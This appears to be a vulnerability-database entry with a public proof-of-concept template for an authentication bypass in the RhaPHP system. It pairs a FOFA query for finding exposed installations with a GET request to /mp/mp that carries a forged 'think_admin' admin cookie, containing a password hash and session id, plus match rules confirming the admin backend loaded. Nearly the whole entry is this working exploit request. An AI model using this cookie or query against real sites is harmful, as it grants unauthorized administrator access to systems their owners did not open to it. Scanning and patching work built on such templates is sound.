rhaphp-universal-cookie: RHaphp universal cookie

Date: 2025-09-01 | Affected software: RHaphp universal cookie | PoC: public

Vulnerability description

FOFA: app="RhaPHP系统安装"

PoC code [public]

id: rhaphp-universal-cookie

info:
  name: RHaphp universal cookie
  author: lsqm
  severity: high
  verified: true
  description: |
    FOFA: app="RhaPHP系统安装"
  created: 2023/06/25

rules:
  r0:
    request:
      method: GET
      path: /mp/mp
      headers:
        Cookie: think_admin=think%3A%7B%22id%22%3A%221%22%2C%22admin_name%22%3A%22admin%22%2C%22password%22%3A%22c77c2771505679b013eac4a6dbb3c6c7%22%2C%22status%22%3A%221%22%2C%22ip%22%3A%22127.0.0.1%22%2C%22last_time%22%3A%221664263362%22%2C%22rand_str%22%3A%22spDjRC%22%2C%22admin_id%22%3A%221%22%7D;PHPSESSID=598c2a7c00f8b59fe4d35d802166e2ed
    expression: response.status == 200 && response.body.bcontains(b"自动回复") && response.body.ibcontains(b"RhaPHP")
expression: r0()
